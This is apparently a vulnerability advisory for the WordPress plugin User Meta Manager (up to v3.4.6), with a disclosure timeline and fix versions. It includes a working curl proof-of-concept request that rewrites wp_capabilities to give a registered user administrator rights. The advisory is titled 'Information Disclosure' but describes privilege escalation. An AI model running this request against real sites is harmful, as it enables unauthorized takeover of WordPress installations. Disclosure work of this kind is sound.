User Meta Manager [Information Disclosure]

WordPress plugin User Meta Manager suffers for a Information Disclosure vulnerability.

Description

User Meta Manager for WordPress plugin up to v3.4.6 suffers from a privilege escalation vulnerability. A registered user can modify the meta information of any registered user, including himself. This way he can modify wp_capabilities meta to escalate his account to a full privileged administrative account.

PoC

curl -c ${USER_COOKIES} \
     -d "mode=edit&umm_meta_value[]=a:1:{s:13:\"administrator\";b:1;}\
     &umm_meta_key[]=wp_capabilities" \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
    &umm_sub_action=umm_update_user_meta&umm_user=${USER_ID}"

Solution

Update to version 3.4.7


WordPress Plugins Information Disclosure
INFO
TIMELINE
  • 2015-12-29:
    Vendor notified via support forums in WordPress.org
  • 2015-12-29:
    Vendor notified via contact form in his site
  • 2015-12-30:
    Requested CVE ID
  • 2016-01-29:
    WordPress security team notified about the issue
  • 2016-02-02:
    Vendor released version 3.4.7
  • 2016-02-04:
    Exploit about getting a csv file still applies in version 3.4.7
  • 2016-02-06:
    Requested CVE ID (no response from 2015-12-30)
  • 2016-02-06:
    Vendor released version 3.4.8 which resolves this issue